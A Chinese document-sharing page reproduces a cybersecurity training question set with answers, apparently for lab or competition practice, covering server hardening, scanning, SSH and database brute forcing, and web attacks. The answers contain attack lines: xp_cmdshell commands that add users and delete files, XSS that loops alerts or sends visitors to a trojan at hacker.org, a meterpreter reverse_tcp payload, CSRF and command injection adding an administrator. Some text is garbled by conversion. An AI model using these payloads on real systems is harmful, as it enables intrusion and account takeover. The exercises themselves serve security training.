ImageVerifierCode 换一换
格式:DOCX , 页数:12 ,大小:21.62KB ,
资源ID:4112052      下载积分:7 金币
验证码下载
登录下载
邮箱/手机:
验证码: 获取验证码
温馨提示:
支付成功后,系统会自动生成账号(用户名为邮箱或者手机号,密码是验证码),方便下次登录下载和查询订单;
特别说明:
请自助下载,系统不会自动发送文件的哦; 如果您已付费,想二次下载,请登录后访问:我的下载记录
支付方式: 支付宝    微信支付   
验证码:   换一换

开通VIP
 

温馨提示:由于个人手机设置不同,如果发现不能下载,请复制以下地址【https://www.zixin.com.cn/docdown/4112052.html】到电脑端继续下载(重复下载【60天内】不扣币)。

已注册用户请登录:
账号:
密码:
验证码:   换一换
  忘记密码?
三方登录: 微信登录   QQ登录  
声明  |  会员权益     获赠5币     写作写作

1、填表:    下载求助     留言反馈    退款申请
2、咨信平台为文档C2C交易模式,即用户上传的文档直接被用户下载,收益归上传人(含作者)所有;本站仅是提供信息存储空间和展示预览,仅对用户上传内容的表现方式做保护处理,对上载内容不做任何修改或编辑。所展示的作品文档包括内容和图片全部来源于网络用户和作者上传投稿,我们不确定上传用户享有完全著作权,根据《信息网络传播权保护条例》,如果侵犯了您的版权、权益或隐私,请联系我们,核实后会尽快下架及时删除,并可随时和客服了解处理情况,尊重保护知识产权我们共同努力。
3、文档的总页数、文档格式和文档大小以系统显示为准(内容中显示的页数不一定正确),网站客服只以系统显示的页数、文件格式、文档大小作为仲裁依据,个别因单元格分列造成显示页码不一将协商解决,平台无法对文档的真实性、完整性、权威性、准确性、专业性及其观点立场做任何保证或承诺,下载前须认真查看,确认无误后再购买,务必慎重购买;若有违法违纪将进行移交司法处理,若涉侵权平台将进行基本处罚并下架。
4、本站所有内容均由用户上传,付费前请自行鉴别,如您付费,意味着您已接受本站规则且自行承担风险,本站不进行额外附加服务,虚拟产品一经售出概不退款(未进行购买下载可退充值款),文档一经付费(服务费)、不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
5、如你看到网页展示的文档有www.zixin.com.cn水印,是因预览和防盗链等技术需要对页面进行转换压缩成图而已,我们并不对上传的文档进行任何编辑或修改,文档下载后都不会有水印标识(原文档上传前个别存留的除外),下载后原文更清晰;试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓;PPT和DOC文档可被视为“模板”,允许上传人保留章节、目录结构的情况下删减部份的内容;PDF文档不管是原文档转换或图片扫描而得,本站不作要求视为允许,下载前自行私信或留言给上传者【a199****6536】。
6、本文档所展示的图片、画像、字体、音乐的版权可能需版权方额外授权,请谨慎使用;网站提供的党政主题相关内容(国旗、国徽、党徽--等)目的在于配合国家政策宣传,仅限个人学习分享使用,禁止用于任何广告和商用目的。
7、本文档遇到问题,请及时私信或留言给本站上传会员【a199****6536】,需本站解决可联系【 微信客服】、【 QQ客服】,若有其他问题请点击或扫码反馈【 服务填表】;文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“【 版权申诉】”(推荐),意见反馈和侵权处理邮箱:1219186828@qq.com;也可以拔打客服电话:4008-655-100;投诉/维权电话:4009-655-100。

注意事项

本文(网络空间安全实训题及讲解.docx)为本站上传会员【a199****6536】主动上传,咨信网仅是提供信息存储空间和展示预览,仅对用户上传内容的表现方式做保护处理,对上载内容不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知咨信网(发送邮件至1219186828@qq.com、拔打电话4008-655-100或【 微信客服】、【 QQ客服】),核实后会尽快下架及时删除,并可随时和客服了解处理情况,尊重保护知识产权我们共同努力。
温馨提示:如果因为网速或其他原因下载失败请重新下载,重复下载【60天内】不扣币。 服务填表

网络空间安全实训题及讲解.docx

1、训测二11 在服务器场景 CentOS5。5上 通过Linux命令行开启mysql服务,并将开启该服务命令字符串作为flag值提交: service mysqld start训测二1-2 在服务器场景 CentOS5。5上 进入mysql 删除user表中host为127。0。0。1 的用户 ,查询剩下用户记录,把查询结果倒数第二条记录的host字段值作为flag值提交:localhost训测二13在服务器场景 CentOS5.5上进入mysql (使用grant语句)添加一个用户test 密码为20170829,它的host为172.19。5。100 ,并赋予所有权限,将所输入代码作为fla

2、g值提交:grant all privileges ON *. TO test172.19。5.100identified by 20170829with grant option;训测二14在服务器场景 CentOS5。5上进入mysql 的配置文件,限制最大连接数为2,并将mysql的配置文件路径F1,及其增加的一行F2作为flag值提交:格式为(F1|F2) (/etc/fmax_user_connections=2)训测二15在服务器场景 CentOS5。5上进入mysql 的配置文件,使其他主机不能远程连接数据库F1,并禁止对本地文件存取F2,将其增加行作为Flag值提交:格式为F1

3、F2skipnetworking|setvariable=localinfile=0训测二16在服务器场景 CentOS5.5上进入mysql 的配置文件, 启动项加固 ,使访问能被审计,并将日志其路径作为flag值提交。/usr/local/mysql/log/mysql。log训测二17在服务器场景 CentOS5。5上开启http服务,其配置文件的路径作为flag值提交: /etc/httpd/conf/httpd。conf训测二1-8在服务器场景 CentOS5.5上进入httpd配置文件,将网站发布目录作为flag值提交:/var/www/html训测二19在服务器场景 CentOS

4、5.5上进入httpd配置文件修改代码使其在出现错误页的时候不显示服务器操作系统的名称。将修改后的一行代码作为flag值提交:ServerTokens Prod训测二110在服务器场景 CentOS5。5上进入httpd配置文件修改代码使其不回显apache版本信息.将修改后的代码作为flag值提交:ServerSignature Off训测二111用渗透平台nmap 扫描靶机CentOS5。5 将其apache版本信息作为flag提交。Apache httpd 2。2.3 ((CentOS))训测二2-1在服务器场景Windows2003上对sqlserver2000进行 sp4补丁安装,重

5、启。将其补丁的文件夹名字F1和增加的端口号(用 netstat an查询)F2作为flag值提交:格式为:F1|F2SQL2KSP4|1433训测二2-2在服务器场景 Windows2003上进入sqlserver2000 服务器使用存储过程添加系统用户njcx.将其输入代码作为flag值提交:exec master.dbo.xp_cmdshell net user njcx /add 训测二2-3在服务器场景Windows2003上关闭xp_cmdshell服务,将其关闭的代码作为flag值提交:exec sp_dropextendedproc xp_cmdshell训测二24在服务器场景W

6、indows2003 上开启xp_cmdshell 服务,将其开启的代码作为flag值提交:exec sp_addextendedproc xp_cmdshell,xplog70.dll训测二2-5在服务器场景 Windows2003上 使用netstat an 查看端口,并将http有关的一行作为flag值提交:TCP 0.0。0.0:80 0.0。0。0:0 LISTENING训测二26在服务器场景 Windows2003上用浏览器打开网页127。0。0.1 将其内容作为flag值提交。训测二27 用渗透平台nmap 扫描靶机win2003将其iis版本作为flag提交。Microsoft

7、 IIS httpd 6。0训测三1.1在服务器场景CentOS5.5上通过Linux命令行关闭ssh服务,将关闭该服命令字符串作为Flag值提交.Service sshd stop训测三1。2 在服务器场景CentOS5。5上通过/Flag/ifconfig去查询ip地址,把flag的值作为flag提交。sbin训测三-1.3用渗透平台对服务器场景CentOS5.5进行综合扫描渗透测试,把显示结果正数第5行的四个单词作为flag值提交。格式为:。.。.|。|.。|PORT|STATESERVICEVERSION训测三1.4在服务器场景CentOS5。5上通过Linux命令行开启ssh服务,将

8、开启该服命令字符串作为Flag值提交。/etc/init。d/sshd start训测三1.5 用渗透平台对服务器场景CentOS5。5进行hydra命令爆破使用所给字典.把现实结果的倒数第二行的第二个数字F1和正确结果的login:后面的字符串F2作为flag值提交.格式为:F1&F21&root训测三1.6用渗透平台对服务器场景CentOS5.5 进行ssh远程登录并且使用 wireshark对其进行协议分析,并把发送的第一个包的长度作为flag值提交48训测三1.7用渗透平台对服务器场景CentOS5.5 进行ssh远程登录并且使用 wireshark对其进行协议分析,并把现实结果中物理

9、mac地址加密方式作为flag值提交。Hmacmd5训测三-2.1 打开靶机,使其与物理机上的window2003虚拟机 建立 ipsec vpn预共享秘钥为123123,用渗透平台wireshark对其进行监听,用其第一阶段的全称作为flag值提交。Internet Security Association and Key Manage Protocol训测三2.2打开靶机,使其与物理机上的window2003虚拟机 建立 ipsec vpn,用渗透平台wireshark对其进行监听,用其第二阶段的全称作为flag值提交。、Encap sulating Security Payload 训测

10、三-2。3打开靶机,使其与物理机上的window2003虚拟机 建立 ipsec vpn,用渗透平台wireshark对其进行监听,找到第一阶段现实结果中的Version:后面的字符串作为flag提交。1.0训测三-2.4打开靶机,使其与物理机上的window2003虚拟机 建立 ipsec vpn,用渗透平台wireshark对其进行监听,找到第二阶段的显示结果的的倒数第一行作为flag值提交。Data (68 bytes)训测三-3。1打开虚拟机2003中的Ethereal,监听到本机通过internet Explorer 访问靶机服务器场景上的Test.html页面内容,并将Ethere

11、al监听到的Test。html页面内容在Ethereal程序当中的显示结果倒数第二行内容作为flag值提交。训测三3。2在虚拟机2003 与靶机2003之间建立sslvpn,须通过CA服务颁发证书;2003服务器域名为,并将2003 服务器个人证书信息的“颁发给:内容作为flag值提交。训测三-3。3在虚拟机2003 与靶机2003之间建立sslvpn,再次打开Ethereal,监听Internet Explorer访问靶机2003服务器场景流量,验证此时Ethereal无法明文监听到intnet Explorer访问靶机2003场景的http流量,并将靶机2003服务器通过ssl Recor

12、d Layer对internet Explorer请求响应的加密应用层数据长度Length值作为flag值提交.301训测四1-1通过渗透平台对CentOS5.5进行渗透,利用msf工具对其进行远程超级管理员口令破解,使其通过root用户登入目标靶机(密码为654321),并将漏洞的路径作为flag值提交。auxiliary/scanner/ssh/ssh_login训测四1-2 对CentOS5。5服务器场景进行安全加固,阻止PC中渗透测试平台对服务器场景CentOS5。5进行远程超级管理员口令暴力破解,并将配置文件路径及配置文件加固的内容字符串作为Flag提交。格式为:F1F2 /etc/

13、ssh/sshd_configPermitRootLogin no训测四1-3再次通过渗透平台对CentOS5。5进行渗透,利用msf工具对其进行远程超级管理员口令破解,使其通过root用户登入目标靶机,并将现实结果的倒数第二行作为flag值提交: Scanned 1 of 1 hosts (100% complete)训测四1-4在服务器场景CentOS5.5上通过Linux命令行添加用户userl,并配置密码。将添加用户的命令字符串F1与配置密码的命令字符串F2作为Flag值提交;格式为:F1F2F3 adduser userlpassword userl训测四15在服务器场景 CentO

14、S5。5上开启http服务,其配置文件的路径作为flag值提交: /etc/httpd/conf/httpd。conf训测四1-6通过PC2中渗透测试平台对服务器场景CentOS5。5进行操作系统综合扫描渗透测试(使用工具NMAP,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;A训测四19通过渗透平台对服务器场景CentOS5。5进行ARP扫描渗透测试(使用arping,发送请求数据包数量为5个),并将该操作使用命令中固定不变的字符串作为flag提交;arping t 5训测四1-10通过渗透平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用arpi

15、ng,发送请求数据包数量为5个),并将该操作结果的最后1行,从左边数第二个数字作为flag提交;5训测四21在靶机与虚拟机上做ipsecvpn,组阻止Sniffer监听渗透测试,虚拟机通过ping访问WebServ2003服务器,将第一个数据包回显结果作为flag提交;Negotiating IP Security.训测四22打开靶机,使其与物理机上的window2003虚拟机 建立 ipsec vpn,用渗透平台wireshark对其进行监听,找到第二阶段的显示结果的的倒数第一行作为flag值提交。Data (68 bytes)训测四2-3在虚拟机2003 与靶机2003之间建立sslvpn

16、,再次打开Ethereal,监听Internet Explorer访问靶机2003服务器场景流量,验证此时Ethereal无法明文监听到intnet Explorer访问靶机2003场景的http流量,并将靶机2003服务器通过ssl Record Layer对internet Explorer请求响应的加密应用层数据长度Length值作为flag值提交。训测四24在服务器场景Windows2003上对sqlserver2000进行 sp4补丁安装,重启,将增加的端口整行信息作为flag值提交。TCP 0。0.0.0:1433 0.0。0。0:0 LISTENING训测四2-5通过PC中的渗透

17、测试平台对服务器场景WebServ2003进行数据库服务扫描渗透测试,并将扫描结果作为Flag提交;训测四2-6通过对服务器场景WebServ2003的数据库服务进行安全加固,阻止PC中渗透测试平台对其进行数据库超级管理员密码暴力破解渗透测试,并将加固身份验证选项中的最后一个字符串作为Flag提交。Windowsw训测四27查找windows2003靶机里的完整的计算机名称作为flag值提交;hh-admin训测四2-8 查找windows2003靶机系统属性中系统:后的字符串作为flag值提交;Microsoft Windows Server 2003 Standard Edition训测四

18、2-9查找windows2003靶机来宾访客用户的名称,将其作为flag值提交;Guest训测四210 查找windows2003靶机的默认共享名,并将查找命令F1与默认共享名F2作为flag值提交。格式为:F1F2net shareC训测五11使用bt5对靶机进行渗透测试,通过暴力破解ssh密码登录系统,并将密码作为flag值提交;981训测五12在服务器场景CentOS5。5上通过Linux命令行开启HTTP服务,并将开启该服务命令字符串作为Flag值提交;/etc/init。d/httpd start训测五14通过PC中渗透测试平台对服务器场景CentOS5。5进行操作系统扫描渗透测试(

19、使用工具NMAP,使用必须要使用的参数),并将该操作显示结果“OS Details:”之后的字符串作为Flag提交;Linux 2。6。9 训测五15在服务器场景CentOS5。5上通过Linux命令行关闭ssh服务,再次打开bt5,行操作系统综合扫描渗透测试,将关闭该服务命令字符串以及第二个服务信息作为Flag值提交;格式为:f1|f2service sshd stop111/tcp open rpcbind (rpcbind V2) 2 (rpc 100000)训测五1-6在服务器场景CentOS5.5上通过Linux命令行添加用户Za,添加密码并且给予root权限,将命令字符串作为Fla

20、g值提交;格式为:F1|F2|F3useradd Zapasswd Za|usermod g root Za训测五19在服务器场景 CentOS5。5上进入httpd配置文件修改代码使其在出现错误页的时候不显示服务器操作系统的名称。将修改后的一行代码作为flag值提交:ServerTokens Prod训测五1-10在服务器场景 CentOS5.5上进入httpd配置文件修改代码使其不回显apache版本信息。将修改后的代码作为flag值提交:ServerSignature Off训测五1-11 在服务器场景CentOS5。5上通过/ifconfig去查询ip地址,把的值作为flag提交.sb

21、in训测五112用渗透平台对服务器场景CentOS5。5 进行ssh远程登录并且使用 wireshark对其进行协议分析,并把发送的第一个包的长度及encryption加密算法作为flag值提交;格式为f1f248aes128ctr训测五-113通过PC中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),并将工具Metasploit中arp_sweep模块存放路径字符串作为Flag(形式:字符串1/字符串2/字符串3。.)提交;auxiliary/scanner/discovery/arp_sweep训测五-1-14通过P

22、C中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5。5在线,请将工具Metasploit中arp_sweep模块运行显示结果的第1行出现的IP地址右边的第1个单词作为Flag提交;appears训测五1-15通过通过PC中渗透测试平台对服务器场景CentOS5。5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的最后1行的倒数第二个单词作为Flag提交

23、;execution训测五-1-16通过PC中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块的运行命令字符串作为Flag提交;exploit训测五2-1在服务器场景Windows2003上对sqlserver2000进行 sp4补丁安装,重启。将其补丁的文件夹名字F1和增加的端口号信息(用 netstat an查询)F2作为flag值提交:格式为:F1F2SQL2KSP4|TCP 0.0。0.0:1433 0。0。0.0:0

24、LISTENING训测五2-2在bt5上使用hydra暴力破解sqlserver数据库(mssql),并将其爆破结果中正确结果login:结果和password:结果作为flag值提交;格式为f1f2sa&1234训测五2-3在靶机2003上打开sql-server,进行存储过程,在c盘下创建文件夹njcx,将其过程作为flag值提交。exec master.dbo。xp_cmdshell md c:njcx训测五-24在虚拟机2003 与靶机2003之间建立sslvpn,再次打开Ethereal,监听Internet Explorer访问靶机2003服务器场景www.test。com流量,验

25、证此时Ethereal无法明文监听到intnet Explorer访问靶机2003场景的http流量,并将靶机2003服务器通过ssl Record Layer对internet Explorer请求响应的加密应用层数据长度Length值作为flag值提交。299信息安全管理与评估补充题1. 配置靶机WebServ2003的DHCP功能,能够分配IP的范围为172.19。X.X(111150),XP客户端申请IP地址,将第二阶段和第四的数据包类型作为Flag值提交,格式为:F1F2;DHCP OFFERDHCP ACK2. 使用渗透机攻击WebServ2003,进行DHCP地址池耗尽攻击,把使

26、用中的IP地址数比例作为Flag提交;100%3.进入loginAuth。php程序,修改PHP源程序,使之可以抵御SQL注入,并填补空缺处内容,将填补内容作为Flag提交,格式为F1|F2F3;Mssql_select_dbPasswordpassword4. 再次对该任务loginAuth.php页面注入点进行渗透测试,验证此次利用任意用户进行SQL注入渗透测试无效,并将回显提示信息作为Flag提交。Username Does Not Exist5.Web继续访问WebServ2003服务器,/-Employee Information Query,分析该页面源程序,找到提交的变量名,并作

27、为Flag提交。usernm5. Web继续访问WebServ2003服务器,/-Employee Information Query”,分析该页面源程序,将表单提交方式作为Flag提交.get6. Web继续访问WebServ2003服务器,”/”-Employee Information Query”,分析该页面源程序,表单提交后跳转页面的路径作为Flag提交。list.html7. 对Employee Information Query页面注入点进行渗透测试,根据输入“%以及“_的返回结果确定是注入点,并将显示结果倒数第三行内容作为Flag提交;Email:wwyahoo。9。通过对该任

28、务题目5页面注入点进行SQL注入渗透测试,删除WebServ2003服务器的C:目录下的1.txt文档,并将注入代码作为Flag提交. exec master。dbo。xp_cmdshell del c:1。txt-10. 进入WebServ2003服务器的C:AppServwww目录,找到QueryCtrl。php程序,分析并修改PHP源程序,将替换为,_替换为_使之可以抵御SQL注入渗透测试,并将修改后新增语句内容作为Flag提交。格式为F1F2F3keyWord=addslashes(KeyWord);keyWord=str_replace(“,”,$KeyWord);keyWord=s

29、tr_replace(“_,”_”,KeyWord);11. 再次对该任务题目5页面注入点进行渗透测试,验证此次利用注入点对该WebServer进行SQL注入渗透测试无效,并将验证过程截图。将系统出现的错误提示作为Flag提交。Bad KeyWord!12. 进入WebServ2003服务器,禁用系统存储过程可以抵御SQL注入渗透测试,将禁用系统存储的语句作为Flag提交.格式为Y1-Y2-Y3Y4.。13. 进入”/” Employee Message Board-”Display Message”页面,再次对页面注入点进行渗透测试,调用存储过程删除WebServ2003服务器的C:目录下的

30、1.txt文档,将页面提示第一个字符串作为Flag提交;Warning14. 进入”/ Employee Message Board”Display Message”页面进行XSS渗透测试,循环弹框”Hacker!,根据该页面的显示,确定是注入点,并将构造的注入代码作为Flag提交。scriptwhile(1)alert(“Hacker!”);;/script15. 通过IIS搭建网站(http:/hacker。org/),并通过渗透机生成木马程序TrojanHorse.exe,将使用的工具和模块路径作为Flag提交。格式为F1F2 msfpayloadWindows/meterpreter/

31、reverse_tcp16. 对该任务题目1页面注入点进行渗透测试,使”/” Employee Message Board”Display Message”页面的访问者执行网站(http:/hacker.org/)中的木马程序:http:/hacker.org/TrojanHorse。exe,并将注入代码作为Flag提交。 Location.href=“htt:/hacker。org/TrojanHorse。exe”;/script17. 进入WebServ2003服务器的C:AppServwww目录,找到insert.php程序,分析并修改PHP源程序,使用替、替换,使之可以抵御XSS渗透测

32、试,并将需要使用的函数和增加语句作为Flag提交。格式为F1/F2Str_replaceinfo=str_replace(“ Shopping Hall,分析该页面源程序,找到最后一次提交的变量名和值作为Flag提交。Goods=dvdrom&quantity=119. 对该任务题目19页面注入点进行渗透测试,使”/”- Employee Message Board-”Display Message页面的访问者向页面ShoppingProcess。php提交参数goods=cpu&quantity=10000,查看/”PurchasedGoods.php页面,并将注入代码作为Flag提交。 s

33、criptdocument。location=http:/192.168.204。126/ShoppingProcess.php?goods=cpuquantity=10000”; /script20. 进入WebServ2003服务器的C:AppServwww目录,找到DisplayMessage.php程序,分析并修改PHP源程序,使之可以抵御CSRF渗透测试,将需要用到的函数作为Flag提交.Strip_tags21. Web访问ebServ2003服务器,”/-” Display Directory”,分析该页面源程序,找到提交的变量名作为Flag。directory22. 对题目22页面注入点进行渗透测试,使页面DisplayDirectoryCtrl.php回显C:Windows目录内容的同时,对WebServer添加账号“Hacker”,将该账号加入管理员组,并将注入代码作为Flag提交.WINDOWSnet user Hacker Pssword /addWINDOWSnet localgroup administrators Hacker /add24.对该任务题目22页面注入点进行第23题渗透测试,使页面DisplayDirectoryCtrl。php回显内容最后一行作为Flag提交。Display C:Directory

移动网页_全站_页脚广告1

关于我们      便捷服务       自信AI       AI导航        获赠5币

©2010-2024 宁波自信网络信息技术有限公司  版权所有

客服电话:4008-655-100  投诉/维权电话:4009-655-100

gongan.png浙公网安备33021202000488号   

icp.png浙ICP备2021020529号-1  |  浙B2-20240490  

关注我们 :gzh.png    weibo.png    LOFTER.png 

客服